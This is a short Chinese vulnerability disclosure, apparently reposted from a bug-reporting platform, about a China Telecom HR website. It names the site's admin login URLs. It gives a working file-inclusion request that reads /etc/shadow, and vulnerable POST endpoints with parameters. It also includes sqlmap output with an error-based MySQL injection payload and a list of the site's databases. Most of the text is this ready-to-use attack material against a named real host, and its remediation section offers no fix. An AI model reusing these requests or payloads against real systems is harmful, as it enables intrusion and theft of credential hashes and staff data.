中国电信某站SQL注入+文件包含 漏洞
后台一:http://rs.hntelecom.net.cn/HRSystem/initIndex.do 后台二:http://rs.hntelecom.net.cn/loginadmin.do?m=login 漏洞类型一: 文件包含:rs.hntelecom.net.cn/filedown.do?m=filedown&path=//////etc/shadow%00
看到没有,root权限的哦 漏洞类型二: 地址:rs.hntelecom.net.cn/search.do?m=search post数据:sss=test&Submit=%cb%d1%20%cb%f7&ttt=test 地址:rs.hntelecom.net.cn/searchD.do?m=searchD post数据:sss=test&Submit=%cb%d1%20%cb%f7&ttt=test 话说2个地址都是一样功能,搞出2个有意思吗
sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: POST Parameter: ttt Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: sss=1&Submit=�� ��&ttt=1' AND (SELECT 7373 FROM(SELECT COUNT(*),CONCAT(CHAR(58,114,108,100,58),(SELECT (CASE WHEN (7373=7373) THEN 1 ELSE 0 END)),CHAR(58,111,112,99,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'JyFl'='JyFl --- available databases [4]: [*] information_schema [*] manpower [*] test [*] yiqilaifinddifferences 修复方案:不继续深入,存在进一步 渗透 风险。
查看更多关于中国电信某站SQL注入+文件包含漏洞 - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did15462